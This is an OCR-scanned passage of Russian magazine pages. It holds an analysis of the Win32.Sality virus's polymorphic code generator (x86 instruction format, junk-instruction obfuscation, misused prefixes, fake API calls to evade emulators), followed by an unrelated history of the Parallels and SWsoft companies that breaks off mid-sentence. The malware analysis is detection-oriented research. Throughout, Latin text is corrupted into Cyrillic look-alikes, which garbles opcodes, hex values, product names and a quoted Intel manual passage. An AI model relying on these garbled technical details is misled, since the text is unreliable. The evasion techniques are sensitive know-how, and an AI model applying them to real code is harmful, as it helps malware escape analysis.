воисточнику- документации Іпіеі, а именно-«ІА-32 Іпіеі® АгсЫ1:ес1:иге 
5оШл/аге Эеѵеіорег’з Мапиаі», часть 2А. 

ФОРМАТ ИНСТРУКЦИИ АРХИТЕКТУРЫ Х86 

Итак, каждая инструкция обязана включать в себя опкод. Он может 
быть какоднобайтовый, так и двух- и трехбайтовый. Если первый байт 



Ликбез: полиморфизм и обфускация 



Полиморфизм -возможность объектов с одинаковой спецификацией 
иметь различную реализацию. Гружено? Согласен! Приведем простой 
пример. Допустим, нам нужно создать код, который заполняет регистр 
ЕАХзначением «О». Возможно множество реализаций: 

РИЗЫ 0; РОР ЕАХ; 

ХОК ЕАХ, ЕАХ; 

МОѴ ЕАХ, 0; 

АЮ ЕАХ, 0; 

В этом и заключается полиморфизм - сделать одно и то же, только 
разными способами. Обфускация - приведение исходного текста или 
исполняемого кода программы к виду, сохраняющему ее функциональ- 
ность, но затрудняющему анализ, понимание алгоритмов работы и 
модификацию при декомпиляции. Конкретный пример: 

РБ8НАБ; МЭР; ЮР; ЮР; ЮР; РОРАБ; АББ ЕАХ, ОхЕЕЕЕЕЕЕЕ; 

ІЮ ЕАХ; ОК ЕАХ, ЕАХ; ЗБВ ЕАХ, ОхЕЕЕЕЕЕЕЕ; РБЗН ЕВХ; РБЗН 
ЕСХ; РОР ЕСХ; РОР ЕВХ; ЬЕА ЕАХ, [ЕАХ] ; МОѴ ЕВХ, ЕВХ; 

Всетри последовательности инструкций не несут никакой полезной 
нагрузки, но вполне могут быть использованы, чтобы «замусорить» 
полезный код. 



опкода равен ОРГ, то он является двухбайтовым. Для трехбайтовых 
возможно несколько вариантов, но это не будет затронуто в статье. 
Каждый опкод обладает определенными свойствами. Например, 

0В86 - МОѴ еАХ, Іх, использует следующие четыре байта, добавляя их к 
инструкции. Таким образом получается, что последовательность байт 
В8 ГР ГР ГР РР эквивалентна инструкции МОѴ ЕАХ, ОРРРРРРРРЬ. Су- 
ществуют опкоды, которые сами по себе образуют инструкцию, напри- 
мер, РИЗН ЕВ Р - 556, Р05НА0 - 606. А есть такие опкоды, в которых 
следующий байт несет определенный смысл и называется МосШМ. 

РакеАРІ - вызов произ- 
вольных АРІ-функций. 
в надежде на то, что эму- 
лятор не поддерживает ра- 
боту с таблицей импортов 
или не может реализовать 
корректное исполнение 

Этот байт состоит из трех полей, показанных на схеме: Моб, Ред/ 
Орсобе, Р/М. С помощью Моб’а определяется тип операнда, исполь- 
зуемого инструкцией - память или регистр. Если его значение равно 
3, то это регистр, а остальные возможные - память. Основное назна- 
чение Р/М и Ред/0 рсобе - указывать на операнды инструкции. А для 
некоторых опкодов, например, 0x80, 0x81 , 0x01 , поле Ред/Орсобе 
указывает на саму операцию, выполняемую инструкцией. Если в 
инструкции полеМоб неравноЗ, и в то же время поле Р/М равно4, 
то появляется еще один байт - 51В. Он также показан на схеме. Он 
используется для формирования инструкций, работающих с состав- 
ными операндами памяти. Например: АЭО ЕАХ, [ЕАХ + ЕСХ*4 + 600]. 
Еще одним необязательным элементом, образующим инструкцию 
является префикс. Каждый префиксзанимаетодин байт. Ноу команды 
может быть сразу несколько префиксов. Они используются для прида- 
ния инструкции определенных свойств. Всего их одиннадцать: 

Р0 - Боек; Р2 - КЕРЫЕ; РЗ - КЕР; 2Е - СЗ зедтепС 
оѵеггійе; 36 - 33 — / / — //-; ЗЕ-Б8 — // — //-; 2 6 - ЕЗ 
-//-// -; 64 - РЗ - // - // -; 65 - СЗ - // - // -; 66 - 
Орегапсі - Зіге; 67 - АсМгезз Зіге; 



► 078 
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Еще немного вируса, но уже в другом файле 



Согласно документации Іпіеі каждый префикс может использовать- 
ся только в определенных целях, хотя, безусловно, их можно вруч- 
ную добавить к произвольной команде. Все сегментные префиксы 
используются совместно с инструкциями, работающими с памятью, 
для обращения к определенному сегменту. А байты ВЕРЫ Е/Р ЕР 
добавляются только к инструкциям, работающим со строками или 
с массивом байт, к примеру - 5СА5В, М0Ѵ5Э, Ю05ѴѴ. Префиксы 
размеров операнда и адреса изменяют соответственно их размеры 
на меньший или больший, в зависимости от режима работы. 

Так что же использует генератор 5а[Ку? Во-первых, он использует 
однобайтовые опкоды, целиком образующие инструкцию. К ним 
относятся все Р1)5Н'ы и РОР’ы. Во-вторых, во всех генерируемых 
инструкциях поле Моб равно 3, чтобы избежать взаимодействия с 
памятью, а оперировать только с другими регистрами или мгновен- 
ными значениями. Исключение составляет команда ИЕА, в кото- 
рой Моб всегда равен 2, а использование 3 приведет к генерации 
исключения. В-третьих, используется множество двухбайтовых 
опкодов, которые опять-таки не оперируют с памятью: БНЮ, В5Е, 
ВТ5, ВТС, ХАЭЭ и др. И напоследок - 5а [бу добавляет байт 666, а 
также сегментные и РЕРхх префиксы к произвольным инструкциям. 
С помощью всех этих методов получается качественный обфусци- 
рованный код, который не взаимодействует с памятью, но при этом 
значительно усложняет анализ кода. 

А теперь можно обсудить и те моменты, которые позволяют отли- 
чить сгенерированный код от кода, полученного компилятором. 
Начнем с префиксов. Генератор в Заібу добавляет их к совершен- 
но произвольным инструкциям. А в документации Іпіеі написано 
следующее: 

«КереаС ргеТіхез (Р2Н, РЗН) саизе ап іпзСгисСіоп Со 
Ье гереаСесІ Рог еасЪ еІешепС оТ а зСгіпд. ІІзе Ытезе 
ргеТіхез опіу міЫт зСгіпд іпзСгисСіопз (МОѴЗ, СМР8 , 
ЗСАЗ, ЬОБЗ, ЗТОЗ, ШЗ, апсі ОІІТ8) . ІІзе оТ гереаС 
ргеііхез апсі/ог ипсіеііпесі орсосіез ѵ^іЫт оЫтег ІА- 
32 іпзСгисСіопз із гезегѵесі; зисЪ. изе шау саизе 
ипргесбісСаЫе ЬеАаѵіог». 

Таким образом, использование префиксов Е2 и ЕЗ возможно лишь с 
ограниченным списком инструкций, а в приведенном выше примере 
кода эти байты находятся перед командами САП, 3 Н б, ТЕ5Т и 
прочими. Аналогичная ситуация и с сегментными префиксами. Их 
использование не по назначению может носить неопределенный 
характер. А в 5а [Ку байт 646 может без проблем предварять инструк- 




Стартовый код Ѵіги$.ѴѴіп32.5аШу.аа в зараженном файле 




Формат инструкции архитектуры х86 



цию САП. Компилятор при генерации кода никогда не будет добав- 
лять префиксы к тем командам, к которым это запрещено делать! 

На что еще следует обратить внимание при просмотре кода? Напри- 
мер, на практически полное отсутствие работы с памятью, а значит, 
и отсутствие локальных и глобальных переменных. Это весьма 
странно, так как компилятор может использовать только регистры 
в коротких функциях, и то при определенных условиях. Еще одна 
особенность полученного кода - совершенно произвольные чис- 
ловые операнды. Такое, конечно, иногда бывает, когда реализуется 
какая-то функция из криптоалгоритма, но даже в ней неттакого 
обилия случайных чисел. 

Переходим к самому последнему этапу генерации кода - добавление 
ЕакеАРІ. Этот метод используется для обхода простых эмуляторов 
или виртуальных машин. А заключается он в вызове произвольной 
АРІ-функции, в надежде на то, что эмулятор не поддерживает работу 
с таблицей им портов или не может реализовать корректное ис- 
полнение. В представленном дизассемблерном листинге в таком ка- 
честве используются две функции - ЕіпбСІ озе и ОеіМобиІеНапбІеА. 
В представленном случае очень легко отличить фэйковые запуски 
от реальных вызовов. Во-первых, результат их работы - регистр 
ЕАХ или его составные части, впоследствии просто стираются и не 
используются, что довольно странно для нормальной программы. 
Во-вторых, функции ЕіпбСІозе должен передаваться корректный 
хэндл, полученный ранее с помощью ЕіпбЕігзіЕКе. А в приведенном 
файле происходит исполнение ЕіпбСІозе (0) прямо с точки входа, 
что явно не может иметь место в нормальном файле. Генератор, при 
добавлении ЕакеАРІ в конечный код, пользуется определенным 
списком, в котором перечислены АРІ-функции, которые получают 
на вход только один параметр иневносят никаких значительных 
изменений в систему. 

ЗАКЛЮЧЕНИЕ 

Итак, в этой статье мы рассмотрели все этапы работы полиморфного 
генератора. Как оказалось, в 5а [Ку очень эффективно используется 
полиморфизм и обфускация. В нем присутствует большое коли- 
чество инструкций, которые не несут полезной нагрузки, значи- 
тельно усложняют статический анализ и практически полностью 
«размывают» полезную нагрузку вируса. Добавление ЕакеАРІ также 
добавляет исследователю головной боли. Но, в то же время, стоит 
отметить и тот факт, что применение всех этих «примочек» значи- 
тельно упрощает определение вредоносного кода. Так, при должном 
опыте, достаточно только одного взгляда, чтобы определить, что 
перед тобой находится зловред. т 
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II ПАРАЛЛЕЛИ II 

ІТ-БИЗНЕСА 



ИСТОРИЯ КОМПАНИИ Рагаііеіз 

На сегодняшний день лишь считанным единицам российских ІТ- 
компаний удалось добиться серьезных успехов за рубежом. Поставлять 
свои продукты на западный рынок и успешно работать с другими 
странами - заоблачная мечта, «пощупать» которую пока смогли лишь 
избранные: АВВѴѴ, Лаборатория Касперского и Рагаііеіз. Если тебя 
не интересуют виртуальные машины для «Маков», а также ПО для 
автоматизации , то, скорее всего, ты нечасто слышишь имя Рагаііеіз, 
однако достижения этой компании сложно недооценить. 



люди 

История Рагаііеіз довольно запутанная и не 
самаятривиальная. Дело втом, что компанию 
создали и по сей день продолжают возглавлять 
очень интересные и яркие люди. С рассказа о 
некоторых из них мы, пожалуй, и начнем наше 
повествование. 

Сергей Белоусов (председатель совета дирек- 
торов и исполнительный директор Рагаііеіз) 

Уроженец города Ленинграда Сергей Белоусов 
— человеккрайне«нелинейной»судьбы. Его 
биография не похожа на стандартное «родился, 
учился, женился, работал», зато за 20 послед- 
них лет он успел принять участие в основании, 
работе и развитии 50 с лишним проектов. 

Нет, Сергей — не очередной гениальный и 
удачливый самоучка, сумевший поймать волну; 
по части образованияу него полный порядок: 
он имеет диплом бакалавра физики, диплом 
с отличием магистра физики и электротехни- 
ки и степень кандидата технических наук по 
специальности «Информатика» Московского 
физико-технического института (МФТИ). 
Именно МФТИ и стал отправнойточкой для 



Белоусова, ведь в далеком 1 992 году именно 
здесьзародилось первое начинание Сергея, 
которе сегодня назвали бы стартапом. Его 
фирма занималасьсборкой и производством 
компов из импортной комплектухи. Все основ- 
ные поставщики последней, какты понимаешь, 
в основном сконцентрированы в странах Вос- 
точной Азии (Тайвань, Гонконг, Япония ит.д.). 
Взаимодействовать с ними оказалосьудобнее 
не из России - идеальныим местом для ведения 
дел оказался Сингапур. Именнотуда, ради 
всеобщего удобства, и перебрался Белоусов. 
Забегая вперед скажем, скажем, что на сегодня 
он является гражданином Сингапура, хотя и 
нельзя сказать, что он «там живет». Дело втом, 
что фактически Сергей живет в дороге и отелях, 
а граджанство Сингапура получил лишь потому, 
что путешествовать с российским паспортом 
было неудобно: приходилось получать много 
виз. 

Но вернемся к делам давно минувших дней и 
сборке компьютеров — дела у молодой компа- 
нии шли неплохо, она уверенно развивалась, 
однако Белоусову вскоре захотелось большего. 
В 1 994, спустя всего два года после основа- 



ния своего первого стартапа, Сергей покинул 
молодую фирму и сразу же окунулся в другое, 
почти аналогичное предприятие. Возникшее 
благадаря связям полученным на сборке ком- 
пьютеров, начинание получило имя ЗіапсІагсІ 
& ѴѴезІегп. 

Компания ЗіапсІагсІ & ѴѴезІегп была основана 
совместно с Ильей Зубаревым, кстати, тоже 
выпускником альма-матер Белоусова — МФТИ. 
Новая компания тоже занималась сборкой и 
производством, с одной лишь поправкой — 
вместо компов 5&ѴѴ производилателевизоры 
и компьютерные мониторы. Забавно, но и это 
начинание Белоусова в будущем ждал немалый 
успех — впоследствии «железное» подразде- 
ление 5&ѴѴ переродится в хорошо известный 
на сегодняшний день бренд по производству 
электроники Роізеп. Но останавливаться на до- 
стигнутом Сергей Белоусов снова не пожелал, 
ни в тот раз, ни в последующие годы. 

Несложно догадаться, что там, где имеется 
«железо», всегда найдется место и софту. ПО 
наконец-то привлекло внимание Белоусова в 
середине 90-х годов, и произошло это, по его 
собственному признанию, случайно. 
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РАКАІ1ЕІ.З 0ЕЗКТ0Р - ВИРТУАЛЬНАЯ 

МАШИНА ДЛЯ «МАКОВ» СЕРГЕЙ БЕЛОУСОВ 



Все началась стого, что будущему Роізеп 
Еіесігопісз потребовалось внедрить бухгал- 
терскую систему. Доступа в Интернеттогда 
не было. По каким-то своим каналам, через 
бывших выпускников МФТИ, проживавших 
в Америке и работавших в банках, удалось 
составить список из 16 Е В Р- продукте в. После 
долгих переговоров, из этого списка осталась 



лишьодна компания — Зоіотоп Зоііѵѵаге. 
Получить копию их дорогостоящего ПО, можно 
было лишь пройдя сертификацию на знание их 
продукта и став реселлером компании. Так, в 
целях банальной экономии, с«Соломон» были 
наведены партнерско-дистрибьютерские мос- 
ты, но кто бы мог подумать, что одними только 
бухгалтерскими системами и скидками дело не 
ограничится. 

Следующий этап в жизни компании можно 
назвать этапом продвинутого аутсорсинга. 



Именнотогда 60 российских инженеров 5&ѴѴ 
стали работать из Сингапура, фактически 
выполняя весь цикл инженерных разработок 
ПО Зоіотоп. 

Команда 5&ѴѴ на тот момент состояла, в 
основном, из наших с тобой соотечественни- 
ков — там были и выпускники того же МФТИ, и 
другие российские инженеры, окончившие не 



менее хорошие российские вузы. Дело в том, 
что ихтруд стоил существенно дешевле, чем 
труд ихзападных коллег, затоуровеньзнаний 
и квалификация, напротив, находились на том 
же уровне, или были куда выше. Впрочем, был 
и еще один нюанс. Дело втом, что нанимать 
других людей просто не получалось — нанимая 
русских, можно было оценить уровень ихзна- 
ний, хотя бы исходя из того, какой ВУЗ закончил 
человек. С другимиже национальностями 
существовали культурные пробелы — мало 



того, что команда Белоусова не могла судить, 
например, об уровне образования соискате- 
лей, но и просто не представляла, чего можно 
от них ожидать. 

Осуществлять работу из России тоже не по- 
лучалось. Владельцы Зоіотоп беспокоились 
по поводу сохранности исходных кодов и их 
возможного использования в плохозащищен- 
ной патентным правом стране. Так что не стоит 
удивляться и спрашивать: «Зачем это они 
везли работников из России в Сингапур, когда 
могли нанять местных за копейки?». 

Итак, ЗіапсІагсІ & ѴѴезІегп заинтересовался 
разработкой софта и довольно быстро сориен- 
тировался в тонкостях разработки ПО, а также 
в нюансах его дистрибуции на рынках других 
стран. Партнерство, заключенное сЗоІотоп 
Зоііѵѵаге случайно, обернулось быстрорасту- 
щим бизнесом. 5&ѴѴ прекрасно справлялись 
с локализацией, продвижением и поддержкой 
в Юго-Восточной Азии ЕРР-систем Зоіотоп, 
ориентированных на сегментсреднего и ма- 
лого бизнеса. А вскоре у «Соломона» нашелся 
еще один проект, который они очень хотели 
поручить кому-нибудь из своих партнеров; 
нужно было заниматься разработкой софта 
для компании Регѵазіѵе, поставщика систем 
управления базами данныхЗоІотоп. ЗіапсІагсІ 
& ѴѴезІегп на тот момент были заинтересованы 
втакого рода работе ничуть не меньше потен- 
циального заказчика, так что договоренность 
была достигнута быстро. 

Николай Добровольский (вице-президент по 
развитию продуктов) 

Одновременно с историей Сергея Белоусова раз- 
вивалась история еще одного человека, который 
также сыграл в Рагаііеіз одну из главных ролей. 
Будущий лауреат премии имени Зворыкина, 




Компания Рагаііеіз имеет более 30 наград и более 55 патентов. 

У Рагаііеіз более 500 партнеров, среди которыхтакие монстры, как МісгозоД, Арріе, Іпіеі, 
АМй, йеіі, НР и ІВМ. 

На российском рынке клиентами Рагаііеіз являются такие крупные компании, как Мас- 
терхост, РБК, Софтлайн и Русоникс. 

Продукты компании поддерживают более 1 млн. серверов и настольных ПК. 

Рагаііеіз обслуживает свыше Юмлн. конечных пользователей в 125странахмира. 

По некоторым данным от90%до98% выручки Рагаііеіз получает за рубежом. 

По словам Сергея Белоусова Рагаііеіз Северная Америка обеспечивает чуть меньше 60% 
выручки, Европа — больше 30%, а Россия пока приносит меньше 3%. 

Рагаііеіз Безкіор для Мае, по мнению многих экспертов, является тулзой для Мас№1 от 
сторонних разработчиков. Ей пользуются свыше 2,5 млн. по всему миру. 
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СЦЕНА 



Николай Добровольский, родился в Москве, в 
1975 году, нередкими в ту пору компьютерами 
судьба свела его совершенно случайно. В на- 
чале 80-х годов, после переезда на новое место 
жительства, Добровольский (тогда — ученик 
4-го класса) решил записаться в какой-нибудь 
кружок, благо Дворец пионеров — тот, что на 
Ленинских горах — был совсем рядом. Такуж 
вышло, что свободные места тогда оставались 
только в кружке информатики, куда Николай и 
подался. 

Как показало время, Добровольский не прога- 
дал ипопалвевою стихию. Начав с програм- 
мирования калькуляторов в кружке Дворца 
пионеров, уже в возрасте 14 лет он выиграл 
всероссийский конкурс по программированию, 
затем поступил в школу при МГТУ им. Баумана, 
а после на автомате был зачислен и в саму 
«Бауманку». Однако с МГТУ у Добровольского 
не сложилось. Дело в том, что Николай подал 
бумаги еще и в Московский институт радио- 
техники, электроники и автоматики (МИРЭА), 
куда тоже благополучно прошел и где, в итоге, и 
остался. Не последнюю роль в нелегком выборе 
между двумя вузами сыграл и тот факт, что в 
МИРЭА, при поддержке компании Эіетепз, 
тогда был создан факультет, готовивший ай- 
тишников. Но помимо айтишных премудростей 
в МИРЭАдавали и бизнес-дисциплины, что 
для Николая было не менее важно. Это оконча- 
тельно решило дело — выбор был сделан не в 
пользу «Баум а нки». 

Работать по специальности, то есть програм- 



мистом, Добровольский начал уже на третьем 
курсе, что не слишком характерно для нашей 
страны вообще, и для того времени в частности. 
Первые халтуры Николаю подбросил его науч- 
ный руководитель. Хотя фактического опыта у 
Добровольского не было, он быстроучился и 
схватывал на лету, что полностью устроило его 
первых работодателей. Вскоре подработка пре- 
вратилась в постоянную работу. 

Таким образом, кмоментуокончанияунивер- 
ситета Николай приобрел немалый опыт. У него 
появились и полезные знакомства, и опре- 
деленный фундамент, и главное — желание 
достигнуть большего. Дело стало за малым: 
осталось перестать работать на кого-то и начать 
работать на себя. Так появилась на светфирма 
РагаІМз, в которой на первых порахтрудилось 
всего около десятка человек(в основном ребя- 
та, с которыми Добровольский перезнакомился 
по работе). 

Стемой виртуальных машин на десктопах, 
которая и станет впоследствии его коньком, 
Николай впервые столкнулся именно по рабо- 
те. Увы, не было никаких красивых«гениальных 
идей», вовремя посетивших гения, и прочих 
изящных поворотов судьбы. Просто в 2000 году, 
в процессе работы над проектом для иност- 
ранного заказчика, понадобилось запустить на 
новых компах, не имеющих поддержки ІВМ, ряд 
старых систем. Так и родилась мысль, что было 
бы круто запустить несколько ОС виртуально, 
внутри одного физического компьютера. Эта 
идея настолько захватила Добровольского, 




что он принялся оттачивать ее и далее, уже 
после того, как проект под того самого, первого 
заказчика был сделан. По сути, Николай заго- 
релся мыслью создать отдельный, собствен- 
ный продукт, но это требовало больших затрат, 
как временных, так и финансовых. 



КОМПАНИЯ 

На сегодняшний день головной офис ком- 
пании РагаІМз расположился, ни много ни 
мало, в Швейцарии, а офисы продаж и вовсе 
раскиданы по всем частям света (более чем в 
1 5 странах мира). Известно также, что разра- 
ботчики обитают преимущественно в Москве, 
а в Новосибирске сконцентрированны службы 
поддержки. И их немало, этих разработчиков, 
прогеров, менеджеров и так далее — штат 
компании насчитывает уже 700 человек по всей 
планете. 

Какже за неполный десяток лет Белоусову уда- 
лось провести компанию отсредних размеров 
стартапа к миллионным прибылям и званию 
одного из крупнейших игроков рынка? Судя 
по всему, рецепт прост и не содержит никаких 
«особенных ингредиентов» — л ишьтяжелая 
работа, жизнь в разъездах, море затраченной 
энергии, атакже умение находитьобщий язык 
с самыми разными людьми и никогда, никогда 
не сдаваться. 

Итак, выше мы прервали историю ЭіапсІагсІ & 
ѴѴезіегп натом, что команда в конце 90-хзаня- 
лась продвинутым аутсорсингом, физически 
разместившись в Сингапуре. Какое-то время, 
примерно вплоть до 2000 года, это работало — 
среди партнеров компании числился уже не 
только Эоіотоп ЭоМаге, но и целый ряд других 
фирм. 

Кстати, в этот же период ЭіапсІагсІ & ѴѴезІегп 
ЭоОл/ѵаге успел переименоваться в ЭѴѴзоіі:. 

Имя сменили из практических соображений: 
во-первых, на слухЭіапсІагсІ & ѴѴезІегп можно 
легко принятьза ЭіапсІагсІ іпѵезітепі:, во-вто- 
рых, прежнее имя было признанно чересчур 
длинным и сложным. 

А потом на Западе, как гром среди ясного 
неба, грянул кризис, и приключился печально 
знаменитый «М-сот ЬиЬЫе». Экономический 
пузырь доткомов лопнул, множество ІТ-ком- 
паний пошли ко дну вместе с ним, а устоявшие 
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оказались в очень трудном положении. В таких 
обстоятельствах западным разработчикам 
стало не до аутсорса, иу ЗѴѴзоІІ резко поубави- 
лось как работы, та к и клиентов. В довершении 
всего, содержать российских разработчиков в 
Сингапуре стало крайне затруднительно — кон- 
курировать стеми же индусами по стоимости 
рабочей силы не представлялось возможным. 
Своих продуктов у компании на тот момент 
не имелось, их нужно было писать и делать 
фактически с нуля, а это штука ресурсоемкая и 
непростая. 

То был очень непростой период в истории 
ЗѴѴзоІІ. Белоусов и его команда понимали, что 
на продвинутом аутсорсинге можно поста- 
вить крест, а значит, пришло время компанию 
перепрофилировать и решать, чем заниматься 
дальше. Было ясно, что, скорее всего, стоит 
попытаться писать свой софт (этот процесс 
был во всех смыслах более контролируемым, 
понятным и, какты понимаешь, более прибыль- 



ным). Но какой софт писать?.. Этот вопрос 
обсуждали долго, но спокойно и рассудительно, 
без скандалов. Все варианты и идеи взвешива- 
лись и продумывались, и в итоге решено было 
прислушаться к«народной молве». 

В то время очень активно обсуждались идеи, 
что «Місгозоіі — уже все», и никому в скором 
будущем не будут интересны коробочные про- 
дукты. Дескать, софт скоро будет продаваться 
и предоставляться исключительно в качестве 
сервисов, и, стало быть, будущее за І_іпих и А5Р 
(Арріісаііоп Бегѵісе Ргоѵісіегз). Интересно, что в 
это же самое время Сергей пытался найти ин- 
весторов для своих приятелей, по признанию 
Белоусова, предлагавших какой-то «непо- 
нятный софт». Но дело не в том, что это был за 
софт, а в том, что все инвесторы утверждали, 
что софт может быть каким угодно, главное — он 
обязательно должен иметь отношение к А5Р 
(Арріісаііоп зегѵісе ргоѵісіегз). Сегодня это 
называется ЗааЗ — зоііѵѵаге аз а зегѵісе или 
облачные вычисления. 

Рынок виртуализации тогда уже зародился и 
даже был немного «окучен»такими компания- 
ми какѴМѵѵаге. Однако решения тех дней были 
еще весьма далеки от идеала — в основном 
они строились на принципе виртуализации 
на уровне оборудования. То есть, каждому 
юзеру выделялись фиксированные «железные 
мощности» — определенное количество места 
на хардах, столько-то памяти и так далее. Само 
собой, это нельзя было назвать рациональной 
тратой ресурсов, и это в ЗѴѴзоІІ поняли быстро. 
Также Белоусов с коллегами пришли к мысли, 



что сегмент софта, ориентированного на нуж- 
ды хостинг-провайдеров и иже с ними — это 
ниша весьма перспективная, и в ней пока не 
слишком тесно. В компании, разумеется, на- 
шлись сведущие в этихтемах инженеры (вот 
тебе и еще один пример, почему хорошо иметь 
команду подготовленных, квалифицирован- 
ных инженеров, а не клан индусов, готовых 
работать за $300 в час), и ЗѴѴзоІІ начал работу 
возначенном направлении. 

Тогда было принято решение перенести 
офис обратно в Россию, а точнее — в Москву. 
Теперь расположение компании в Сингапуре 
уже скорее мешало, а не помогало делу, и 
ощутимо било по карману. 

Стоит отдельно заметить, что в это же время 
ЗѴѴзоІІ попыталась создать и некую единую 
платформу для АЗР-приложений. Однако 
на деле оказалось, что сразу разработать и 
операционную систему, и систему управления 
и хранения данных — это несколько чересчур, 
и вряд ли эта задача вообще под силу БѴѴзоіТ. 



Со временем разработка ОС была прекраще- 
на вовсе (от нее остался продукт виртуали- 
зации Рагаііеіз Ѵігіиогго Сопіаіпегз], а вот 
систему управления и хранения данных вы- 
делили в отдельный проект Асгопіз. Коммен- 
тарии здесь излишни, так как это название и 
сегодня знакомо каждому уважающему себя 
ІТ’шнику. 

Сергей Белоусов лично отправился колесить 
по свету — он встречался с представителями 
самых разных хостинг-провайдеров и дата- 
центров, от крупных компаний до крохотных 
частных фирмочек. Дело в том, что просто со- 
здать продукт — мало, после этого его нужно 
было и кому-то продать... 
Какнисмешно.нопервымина до вольно дол- 
гое время последним клиентом, клюнувшим 
на тогда еще даже недоработанное «управ- 
ленческое» ПО от ЗѴѴзоІІ, стал небольшой хос- 
тер из Нижнего Новгорода. О компании Бело- 
усова в Нижнем узнали вовсе не от Сергея, а 
через Интернет. Хостерутак приглянулась бе- 
та-версия софтины Ѵіііиогго Сопіаіпегз, что 
он сам приехал к разработчикам с наличными 
и буквально умолил их продать ему прогу в 
текущем виде, хотя та была еще не готова и 
являла собой сыроватую бету. Впоследствии 
этот хостер даже ощутимо помог с бета-тес- 
том, так как купленное ПО сразу же принялся 
использовать по назначению :). 

В это же время компания озадачилась и 
активным поиском инвесторов, так какдля 
разработок нужны были деньги, а финан- 
совый поток из-за пузыря доткомов сильно 



обмелел. Инвесторы идти навстречу российс- 
ким бизнесменам не спешил и, и, по большому 
счету, немалую часть средств в ЗѴѴзоІІ тогда 
из собственного кармана вкладывал сам 
Сергей Белоусов (на поддержку шли и деньги, 
полученные от других проектов, и, похоже, 
даже личные сбережения). Коллеги и партне- 
ры Сергея до сих пор поражаются, каку него 
тогда вообще хватилотерпения пережить все 
эти трудности и не бросить все к черту. 
Примерно тем же занимался в это время и 
Николай Добровольский, чья Рагаііеіз тоже 
остро нуждалась в инвестициях и клиентах. В 
русскихтогда (да и сейчас) вообще инвести- 
ровали крайне неохотно — западным вороти- 
лам из венчурных фондов плохо понятно, что 
за вузы мы заканчивали, какова наша квали- 
фикация, насколько мы серьезны и можно ли 
вообще вести с нами какие-то дела. В итоге, 
чтобы хоть как-то сводить концы с концами и 
не бросать разработку, которая все тянулась 
и тянулась, часть команды Рагаііеіз (включая 
самого Николая), устроилась на вторую, пос- 
тоянную работу в «Росгосстрах». Долго так, 
конечно, продолжаться не могло, но на двух 
работах эти отчаянные люди продержались 
более года. После трудного дняв офисе они 
возвращались домой и приступали ко второй, 
не менее сложной работе — писали собствен- 
ный софт. К счастью, когда силы были уже 
совсем на исходе, первая рабочая версия 
продукта, больше напоминавшая прототип, 
была готова. Теперь можно было рискнуть и 
расстаться с «Росгосстрахом», что Добро- 
вольский и сделал. На дворе был 2003 год. 

К 2004 году, устав безрезультатно искать 
инвестиции на Западе, Николай решил 
попытать счастья в России. Он признается, 
что было страшно — маленькая команда с 
вроде бы интересной разработкой на руках... 
Случиться могло все, что угодно, но иных ва- 
риантов уже попросту не оставалось. И, какты 
догадался, тут-то они, наконец, и нашли друг 
друга — ЗѴѴзоІІ и Рагаііеіз встретились. 

НОВЕЙШАЯ ИСТОРИЯ. ПРОДУКТЫ 

Вначале Николай Добровольский познако- 
мился с одним из основателей ЗѴѴзоіІ — Ста- 
ниславом Протасовым. Этот человек начинал 
свой путь в компании с должности сисадмина 
и спеца в области ІІпіх, но к моменту знакомс- 
тва с Добровольским уже возглавлял москов- 
ский офис ЗѴѴзоіІ, а ныне вообще занимает 
в Рагаііеіз пост старшего вице-президента и 
руководит В&Б всех продуктов компании. 

В те трудные времена Протасов сам вышел на 
Николая — он уже был осведомлен о разра- 
ботках Рагаііеіз и считал их достаточно инте- 
ресными и перспективными. Встретившись с 
Добровольским лично и пообщавшись более 
детально, Станислав окончательно убедился 
в правоте своих суждений, после чего и пред- 
ставил главу Рагаііеіз Сергею Белоусову. 
Стало окончательно ясно, что от слияния все 
только выиграют — разработки Рагаііеіз были 
крайне интересны и должны были идеально 



«Со временем разработка ОС была прекра- 
щена, а вот систему управления и хране- 
ния данных выделили в отдельный проект 
Асгопіз» 
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вписаться в линейку продуктов БѴѴзоіф а пос- 
ледний уже мог предложить Добровольскому 
и его разработчикам столь необходимые 
им инвестиции. Сделку заключили быстро. 

Ра га Иеіз стал частью холдинга БѴѴзоІф при 
этом оставшись самостоятельной компанией. 
Избавившись от головной боли, то есть от 
постоянных размышлений на тему «где взять 
денег?» и от бумажных проблем, Доброволь- 
ский и еголюди смогли, наконец, всецело 
сосредоточиться на работе. Помощь более 
опытных инженеров из команды Белоусова 
здесь пришлась очень кстати. В различных 
интервью Николай потом не раз говорил, что 
он очень много му научился у этих людей, как в 
вопросах разработки коммерчески успешного 
ПО, так и в вопросах маркетинга и ведения 
бизнеса в целом. К примеру, настоятельный 
«совет» переориентироваться на западный 
рынокдали Рагаііеіз именно «старшиетова- 
рищи». Сказать, что Добровольскому тогда 
пришлось почти полностью переделывать 
свой проект, согласно полученным рекомен- 
дация, не будет сильным преувеличением :). 
Совсем скоро Николай Добровольский дока- 
зал, что в него инвестировали и поверили не 
зря. Уже в 2005 году из-под его пера вышла 
первая законченная версия софтины вирту- 
ализации десктопов для ѴѴіпбоѵѵз, а в 2006, 
буквально порвав рынок, появился на свет и 
Рагаііеіз Безкіор для Мае. 

Дело в том, что именно тогда, в 2006 году, 
Арріе решила перейти на процы от Іпіеі, что 
существенноупрощало и облегчало рабо- 
ту виртуальных машин на «Маках». Такой 
шансупускать было нельзя. Узнав о смене 
архитектуры, Добровольский лично съездил в 
Германию, привез оттуда новенький «Макин- 
тош» и с головой ушел в работу. Бета-версия 



Рагаііеіз Безкіор для Мае была готова через 
рекордные 3,5 месяца. 

Стоит заметить, что сам Арріе тогда выпустил 
утилиту ВооЮатр, которая позволяла после 
перезагрузки юзать на «Маке» либо ѴѴіпбоѵѵз, 
либо Мае 05. То есть, ни о какой виртуализа- 
ции речи не шло. С выходом же виртуальной 
машины Добровольского у всех яблофагов 
наконец-то появился удобный способ поль- 
зоваться «виндовым» софтом и железками, 
не имеющими «дров» под Мае 05, безо 
всяких ребутов и извращений. Кроме того, на 
протяжении полутора с лишним лет продукт 
Рагаііеіз был фактически единственным ре- 
шением такого рода — тяжеловесным ком па - 
ниям-монстрам ПО-разработки понадобилось 
почти два года, чтобы написать и выпустить 
свои аналоги. В итоге детище Добровольского 
завоевало миллионы пользователей (преиму- 
щественно западных, у нас «Маки» до сих пор 
не столь сильно распространены] и принесло 
Рагаііеіз миллионные прибыли. 

В том же 2005 году, и без того довольно 
удачном для БѴѴзоіф к компании пришли 
и масштабные инвестиции сразу от ряда 
солидных венчурных фондов: Веззетег 
Ѵепіиге Рагіпегз, ІпзідЫ Ѵепіиге Рагіпегз и 
